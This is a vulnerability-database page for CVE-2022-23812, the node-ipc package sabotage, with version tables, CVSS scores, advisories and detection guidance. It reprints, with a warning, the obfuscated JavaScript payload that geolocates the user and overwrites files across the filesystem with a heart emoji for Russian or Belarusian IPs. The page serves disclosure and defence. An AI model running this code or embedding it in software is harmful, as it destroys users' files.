CVE-2022-23812
published 2022-03-16CVE-2022-23812: This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus…
PriorityP277critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
4.16%
89.6th percentile
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| node-ipc_project | node-ipc | >= 10.1.1 < unspecified | unspecified |
| node-ipc_project | node-ipc | >= 10.1.1 < 10.1.3 | 10.1.3 |
| node-ipc_project | node-ipc | >= 10.1.1 < 10.1.3 | 10.1.3 |
| node-ipc_project | node-ipc | >= 11.0.0 | — |
| node-ipc_project | node-ipc | >= unspecified < 10.1.3 | 10.1.3 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect outbound HTTPS GET requests to api.ipgeolocation.io with the specific API key ae511e1627824a968aaaa758a5309154 in the query string, originating from Node.js processes — this is the geolocation beacon used to determine if the victim is in Russia or Belarus before triggering the payload. ↗
- →Alert on mass file overwrites where file contents are replaced with the heart emoji (❤️, UTF-8 bytes E2 9D A4 EF B8 8F). The malware recursively traverses ./, ../, ../../, and / and calls fs.writeFile on every reachable file. ↗
- →Flag presence of node-ipc versions 10.1.1 or 10.1.2 in package-lock.json / node_modules, as these are the confirmed malicious versions removed from the NPM registry. ↗
- →Detect base64-encoded strings 'Li8=', 'Li4v', 'Li4vLi4v', 'Lw==', 'Y291bnRyeV9uYW1l', 'cnVzc2lh', 'YmVsYXJ1cw==', '4p2k77iP' within JavaScript source files or evaluated strings — these are obfuscation markers unique to this malware. ↗
- →From node-ipc version 11.0.0 onwards, the malicious behavior is delegated to the imported 'peacenotwar' package rather than being inline — audit dependency trees for peacenotwar as a transitive dependency. ↗
- →The setTimeout delay is randomized (Math.ceil(Math.random() * 1e3) ms) and execution is probabilistic (only fires ~75% of the time via Math.round(Math.random()*4) > 1 check) — sandbox detonation may not trigger on first run; repeat execution is needed for reliable detection. ↗
- ·The geolocation API key (ae511e1627824a968aaaa758a5309154) is hardcoded in the malware. If the key is revoked or the endpoint changes, the geolocation check silently fails and no file destruction occurs — victims outside Russia/Belarus are unaffected by the destructive payload but the beacon call still fires. ↗
- ·Versions 10.1.1 and 10.1.2 were removed from the NPM registry; version 10.1.3 is the patched release. Environments with cached or vendored copies of 10.1.1/10.1.2 remain at risk even after registry removal. ↗
- ·The payload only triggers when the resolved country_name field (lowercased) contains 'russia' or 'belarus'. VPN or proxy usage by victims in those countries would bypass the geolocation check and prevent file destruction. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Embedded Malicious Code in node-ipc
ghsa·2022-03-16
CVE-2022-23812 [CRITICAL] CWE-506 Embedded Malicious Code in node-ipc
Embedded Malicious Code in node-ipc
The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files dependent upon the geo-location of the user IP address. The maintainer removed the malicious code in version 10.1.3.
OSV
Embedded Malicious Code in node-ipc
osv·2022-03-16
CVE-2022-23812 [CRITICAL] Embedded Malicious Code in node-ipc
Embedded Malicious Code in node-ipc
The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files dependent upon the geo-location of the user IP address. The maintainer removed the malicious code in version 10.1.3.
VulnCheck
NPM Package node-ipc Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-23812 [CRITICAL] NPM Package node-ipc Vulnerability
NPM Package node-ipc Vulnerability
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeoloc
No detection rules found.
No public exploits indexed.
https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.jshttps://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580https://github.com/RIAEvangelist/node-ipc/issues/233https://github.com/RIAEvangelist/node-ipc/issues/236https://security.netapp.com/advisory/ntap-20220407-0005/https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.jshttps://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580https://github.com/RIAEvangelist/node-ipc/issues/233https://github.com/RIAEvangelist/node-ipc/issues/236https://security.netapp.com/advisory/ntap-20220407-0005/https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370
2022-03-16
Published
Exploited in the wild